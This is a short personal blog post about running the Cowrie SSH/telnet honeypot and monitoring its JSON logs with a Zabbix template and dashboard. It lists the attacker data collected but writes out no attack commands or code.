Do you know how often your system is attacked, or what the attackers would do if they could actually ssh into your systems?
Cowrie is a funny little ssh/telnet honeypot. It can work in several different modes, but basically it is emulates a Linux/Unix shell, capturing everything that an attacker attempted to do. However, none of the commands that attacker thinks they are running are real; the output mimics actual shell, and you can configure it to respond more. You can use static responses or even hook Cowrie with an LLM to come up with responses in bit laggy real-time.
The thing then logs the sessions for example in JSON or plain text formats, or it can push data to Elasticsearch or many different IP reputation services.
But, as always, I wanted to monitor it with Zabbix to see what happens within my little honeypot. Quite a lot, I would say.
Setting up Cowrie
Please refer to Cowrie installation if you are interested to try out yourself. You can install it via Docker or PyPI. I created a dedicated cowrie user for which I installed the PyPI version to make Zabbix agent integration then super trivial.
Setting up Zabbix template
My Zabbix agent is reading Cowrie JSON log files and Zabbix then parses those with standard item pre-processing. As "everybody" now uses AI, so did I for this template, too.
With this template, I get
- Attacker IP
- Successful and failed login attempts
- Usernames and passwords that were attempted
- Commands that were run during the session
Example dashboard
Data like this would not do any good if I would not have a dashboard for it. Well, here goes! As you can see, the attacks are constant, silent moments are very rare.
All this sure is very educational. Whether monitoring something like this excites me or makes me absolutely terrified, I don't know. It gets even scarier -- or more useful -- if you feed these logs to LLM of your choice and ask it to produce a report for you.
Add new comment